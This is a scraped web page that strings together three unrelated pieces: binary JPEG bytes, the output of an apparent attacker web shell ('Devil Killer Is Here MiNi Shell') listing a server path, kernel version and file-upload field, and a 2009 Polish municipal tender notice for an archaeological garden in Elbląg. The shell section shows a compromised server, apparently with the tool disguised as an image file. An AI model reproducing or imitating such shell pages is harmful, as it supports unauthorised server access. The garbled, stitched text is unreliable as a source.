JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090803/125453-N-2009.html

<p class="kh_header"><b>Elbląg: Zagospodarowanie terenu pomiędzy ul. Rybacką, Mostową i Wodną 
z elementami ogrodu archeologicznego</b><br>
<b>Numer ogłoszenia: 125453 - 2009; data zamieszczenia: 03.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu pomiędzy ul. Rybacką, Mostową i Wodną 
z elementami ogrodu archeologicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	
Zagospodarowanie terenu pomiędzy ul. Rybacką, Mostową i Wodną 
z elementami ogrodu archeologicznego

Przedmiot główny:
Nazewnictwo wg CPV:	Roboty w zakresie zagospodarowania terenu
Przedmiot dodatkowy:
Nazewnictwo wg CPV:	Instalacje zasilania elektrycznego

Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na zagospodarowaniu terenu pomiędzy ul. Rybacką, Mostową i Wodną z elementami ogrodu archeologicznego na Starym Mieście w Elblągu. 
Teren objęty jest ochroną konserwatorską na mocy decyzji Nr 77/1/59 z dnia 27.06.1959 r.
2.	Przedmiot zamówienia opisuje niżej wymieniona dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót budowlanych:



A. DOKUMENTACJA PROJEKTOWA - PRZEDMIARY ROBÓT:
1)  PRZEDMIAR SZCZEGÓŁOWY
     NAZWA INWESTYCJI: 	PLAC MIEJSKI OGRÓD ARCHEOLOGICZNY W OBSZARZE      STAREGO MIASTA W OBRĘBIE ULIC WODNA, RYBACKA, MOSTOWA, OGRANICZONYCH ŚCIEŻKĄ  KOŚCIELNĄ
ADRES INWESTYCJI:	   Elblągu Dz. nr 145; 146; 116; 201/1
BRANŻA:		   budowlana i drogowa    	

2)  PRZEDMIAR ROBÓT
     BUDOWA: 	PLAC MIEJSKI OGRÓD ARCHEOLOGICZNY W OBSZARZE      STAREGO MIASTA W OBRĘBIE ULIC WODNA, RYBACKA, MOSTOWA, OGRANICZONYCH ŚCIEŻKĄ  KOŚCIELNĄ
OBIEKT:		OŚWIETLENIE TERENU OGRÓD ARCHEOLOGICZNY I UL. RYBACKIEJ
     Adres:		   	  ELBLĄG STARE MIASTO    

Przedmiary stanowią ZAŁĄCZNIK Nr 5 do SIWZ.


B. DOKUMENTACJA PROJEKTOWA - PROJEKTY:
    1)  PROJEKT ARCHITEKTONICZNO - BUDOWLANY 
    ADRES:	82-300 ELBLĄG, STARE MIASTO OBRĘB ULIC WODNA, RYBACKA, MOSTOWA OGRANICZONYCH ŚCIEŻKĄ KOŚCIELNĄ
    DZIAŁKA NR:	145, 146, 116,201/1.
    TEMAT:		PLACU MIEJSKI OGRÓD ARCHEOLOGICZNY 		
    BRANŻA:	ARCHITEKTONICZNA I DROGOWA   	
	
	   2) OBIEKT:		  ZASILANIE I OŚWIETLENIE TERENU
  ADRES:	82-300 ELBLĄG, STARE MIASTO OBRĘB ULIC WODNA, RYBACKA,  MOSTOWA OGRANICZONYCH ŚCIEŻKĄ KOŚCIELNĄ	
  DZIAŁKA NR:	145, 146, 116,201/1.
  TEMAT:		PLAC MIEJSKI OGRÓD ARCHEOLOGICZNY		
  BRANŻA:		   ELEKTRYCZNE


C. SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH:
SPECYFIKACJA I WARUNKI ODBIORU ROBÓT
ADRES:	82-300 ELBLĄG, STARE MIASTO OBRĘB ULIC WODNA, RYBACKA,  MOSTOWA OGRANICZONYCH ŚCIEŻKĄ KOŚCIELNĄ	
DZIAŁKA NR:	145, 146, 116,201/1.
TEMAT:		PLACU MIEJSKI OGRÓD ARCHEOLOGICZNY 		
BRANŻA:		   SPECYFIKACJA I WARUNKIODBIORU ROBÓT

Dokumentacja projektowa - projekty wymieniona w pkt B. oraz specyfikacje techniczne, wymienione w pkt C., stanowią ZAŁĄCZNIK Nr 6 do SIWZ.

3.	Zaleca się, aby Wykonawca dokonał wizji lokalnej w celu zapoznania się z zakresem prac i warunkami ich wykonania.
4.	Roboty będą prowadzone pod nadzorem konserwatorskim.
5.	Robotami może kierować tylko osoba, która spełnia wymagania określone w § 8 ust.1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych.
6.	W przypadku dostarczenia zabezpieczenia należytego wykonania umowy w formie gwarancji, Zamawiający wymaga, aby były one zgodne ze wzorcami stanowiącymi ZAŁĄCZNIK NR 4 do SIWZ.
7.	W przypadku wygrania przetargu Wykonawca sporządzi harmonogram rzeczowo - finansowy wykonania robót objętych umową i przedłoży do zatwierdzenia w terminie 7 dni od daty zawarcia umowy.
8.	W przypadku wygrania przetargu i realizacji robót przy udziale podwykonawców, Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 647 ze znaczkiem 1 Kodeksu cywilnego.
9.	W przypadku wygrania przetargu i realizacji robót przy udziale podwykonawców, Wykonawca zobowiązany będzie do zawarcia umów przelewu wierzytelności na rzecz podwykonawców, należnych im za wykonane roboty.
10.	W przypadku wygrania przetargu, Wykonawca zobowiązany będzie do ubezpieczenia budowy od mogących wystąpić szkód, nagłych zdarzeń losowych oraz od odpowiedzialności cywilnej na okres od dnia rozpoczęcia do dnia ukończenia robót, obejmującego:
-	ubezpieczenie robót, urządzeń i sprzętu budowlanego do wysokości 100% umownego wynagrodzenia,
- ubezpieczenie osób trzecich.
11.	Zamawiający przewiduje wykonanie robót w 2009 roku do wysokości środków posiadanych w budżecie tj. do kwoty 263 419,73 zł.
Zamawiający dopuszcza wykonanie większego zakresu robót w 2009 r. z zastrzeżeniem, że faktura za zwiększony zakres robót zostanie wystawiona przez Wykonawcę i zapłacona przez Zamawiającego w 2010 roku.

12.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty:
1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór Wykonawcy. 
2.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a)	konieczność przedłużenia terminu umownego z powodu:
-	działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności (np. przeszkody atmosferyczne o charakterze katastrof).
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę.
-	z przyczyn zależnych od Zamawiającego, tj. z powodu:
a.	nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy,
b.	decyzji służb konserwatorskich mających wpływ na przesunięcie terminu realizacji robót takich jak wstrzymanie budowy, konieczność wykonania dodatkowych badań archeologicznych.
b)	ograniczenie zakresu robót wynikające z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego dokumentacji projektowej, które wynikały w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu zamówienia,

c)	konieczność zmiany terminu umownego i harmonogramu realizacji robót z powodu:
-  konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.
- zmiany wymagań związanych ze zmianą lub wydaniem nowego pozwolenia na budowę dola realizacji zamówienia, wynikających z konieczności wykonania robót zamiennych  niewykraczających poza zakres przedmiotu zamówienia, a koniecznych dla wykonania całości robót i uzyskania założonego efektu użytkowego,
- zmiany przepisów, które skutkują zmianą pozwolenia na budowę wydanego dla realizowanego     zamówienia,
-	konieczność wykonania prac wynikających z zaleceń organów uprawnionych np. Nadzoru  budowlanego, itp.

d)	zwiększenie lub zmniejszenie ilości robót wynikających z rzeczywistych obmiarów, które powodują zmianę wartości umownej,

e)	zmiana kierownika budowy w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego,
f)	zmiana podwykonawców robót w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego,

g)	zmiana finansowania robót w poszczególnych latach związana ze zmianą budżetu, otrzymaniem dotacji, pożyczek lub innych środków uzyskanych z zewnątrz,

h)	ograniczenie zakresu robót wynikające z braku środków finansowych Zamawiającego,

i)	zmiana danych podmiotowych Wykonawcy,

j)	ustawowa zmiana stawki podatku VAT lub zmiana cen materiałów budowlanych w sytuacji   łącznego spełnienia dwóch przesłanek:
-	gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia  byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art.357 ze znaczkiem 1 Kodeksu Cywilnego,
-	zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy.

     3. W przypadku żądania przedłużenia terminu umownego z przyczyn niezależnych od Zamawiającego, zostanie przeprowadzona następująca procedura:
-	Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem,
-	Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
	
4. Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.

13.	Wykonawca udzieli Zamawiającemu pisemnej gwarancji na okres 51 miesięcy dla całości robót licząc od daty odbioru końcowego.
14.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
15.	Zamawiający informuje, że nie przewiduje udzielania zamówień uzupełniających.

16.	Zakres zamówienia.
Zakres robót będących przedmiotem niniejszego zamówienia obejmuje zagospodarowanie terenu pomiędzy ul. Rybacką, Mostową i Wodną z elementami ogrodu archeologicznego na Starym Mieście w Elblągu.
Na zakres prac objętych niniejszym zamówieniem składa się wykonanie następujących robót:
1)	Roboty rozbiórkowe.
2)	Nawierzchnie Placu Miejskiego.
3)	Nawierzchnie chodników wzdłuż ulicy Mostowej i Wodnej.
4)	Nawierzchnia Ścieżki Kościelnej.
5)	Mała architektura:
a.	postumenty z informacją o historii poszczególnych kamienic,
b.	obudowa drzew,
c.	ławki,
d.	śmietniki,
e.	słupki ograniczające,
f.	maszty na flagi okolicznościowe,
g.	demontaż i montaż ogrodzenia trwałej odkrywki archeologicznej.
6)	Zieleń.
7)	Zasilenie i oświetlenie terenu Ogrodu archeologicznego.

Zamawiający wymaga złożenia:

 - zgodnie z pkt VI ppkt 2.1. SIWZ Oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień    publicznych.
Uwaga:
a)	   Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa    każdy z  Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.31.53.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

Warunkiem udziału w postępowaniu jest:
a)	Wykonanie przez Wykonawcę w sposób należyty w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych odpowiadających swoim rodzajem robotom        budowlanym stanowiącym przedmiot zamówienia, tj.: 
      -	co najmniej 1 roboty budowlanej polegającej na wykonaniu nawierzchni kamiennej na terenie          objętym ochroną konserwatorską o powierzchni min. 500 m2 dla jednej roboty
      oraz
      -	co najmniej 1 roboty budowlanej obejmującej roboty murowe z cegły klinkierowej lub cegły   ceramicznej licowej o powierzchni min. 50 m2 dla jednej roboty

       Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku, tj. liczba wykonanych robót będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn. że np. jeden z wykonawców wspólnie ubiegających się może wykazać wykonanie 1 roboty budowlanej polegającej na wykonaniu nawierzchni kamiennej na terenie objętym ochroną konserwatorską o powierzchni min. 500 m2 dla jednej roboty, a drugi z wykonawców wspólnie ubiegających się może wykazać wykonanie 1 roboty budowlanej obejmującej roboty murowe z cegły klinkierowej lub cegły ceramicznej licowej o powierzchni min. 50 m2 dla jednej roboty. Natomiast nie podlegają sumowaniu ilości nawierzchni i powierzchni podanych w warunku.
	
	Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia / Protokołu odbioru robót, podając datę i kurs.

     b)   Zatrudnienie przeciętnie w okresie ostatnich trzech lat min. 10 pracowników.

c)	Dysponowanie:
- Kierownikiem budowy ze stażem łącznym pracy jako kierownik budowy min. 5 lat, który posiada         wymagane uprawnienia do kierowania robotami branży drogowej 
             - Kierownikiem robót ogólnobudowlanych ze stażem pracy 3 lata i 2 lata praktyki przy zabytkach   nieruchomych posiadającym wymagane uprawnienia do kierowania robotami branży ogólnobudowlanej
	oraz 
             -	kierownikami robót branżowych, tj. kierownikiem robót elektrycznych, kierownikiem robót sanitarnych, z których każdy ma łączny staż pracy jako kierownik robót min. 2 lata. 
		Kierownik budowy i kierownicy robót muszą posiadać wymagane uprawnienia budowlane i być członkami właściwych izb samorządu zawodowego. 
	
	Zgodnie z ustawą z dnia 7 lipca1994r. - Prawo budowlane, samodzielne funkcje techniczne w budownictwie m.in. kierowanie budową lub innymi robotami budowlanymi, mogą wykonywać wyłącznie osoby posiadające wymagane uprawnienia budowlane, będące członkami właściwych izb samorządu zawodowego (tekst jednolity: Dz. U. z2006r., Nr 156, poz. 1118 z późn. zm.)

	Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 18.03.2008 o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394)

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ 

2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2.a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. SIWZ 

3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2.b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VI. ppkt 1.4. SIWZ 

4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2.c) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ oraz dokumentów wymienionych  w pkt VI. ppkt 1.5., 1.6. i 1.7. SIWZ 

5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ 

6) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ  

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt. VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-  zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)   Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

- zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy  z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić roboty potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia z podaniem ich wartości oraz daty i miejsca wykonania.
b)	Dla roboty budowlanej polegającej na wykonaniu nawierzchni kamiennej o powierzchni min. 500 m2  należy podać dodatkowo informacje, czy była wykonana na terenie objętym ochroną konserwatorską oraz podać rodzaj nawierzchni i wielkość jej powierzchni.
c)	Dla roboty budowlanej obejmującej roboty murowe z cegły klinkierowej lub z cegły ceramicznej licowej o powierzchni min. 50 m2 należy podać dodatkowo informacje o wielkości powierzchni roboty murowej z cegły klinkierowej lub z cegły ceramicznej licowej. 
d)	Dla robót wymienionych w wykazie należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie.
e)	Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia / Protokołu odbioru robót, podając datę i kurs.
f)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.

-   zgodnie z pkt VI. ppkt 1.4. SIWZ - Informacji na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2.b) ogłoszenia.

-  zgodnie z pkt VI. ppkt 1.5. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Uwaga:
a)	Na potwierdzenie spełniania warunku określonego w Sekcji III.2) ppkt 2.c) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	Dla kierownika budowy wymienionego w wykazie należy podać liczbę lat łącznego stażu pracy jako kierownik budowy.
c)	Dla kierownika robót ogólnobudowlanych wymienionego w wykazie należy podać liczbę lat  stażu pracy jako kierownik robót ogólnobudowlanych oraz liczbę lat praktyki przy zabytkach nieruchomych.
d)  Dla kierowników robót branżowych, tj. kierownika robót elektrycznych, kierownika robót sanitarnych, wymienionych w wykazie należy podać dla każdego z nich liczbę lat łącznego stażu pracy jako kierownik robót.
e) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.7. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
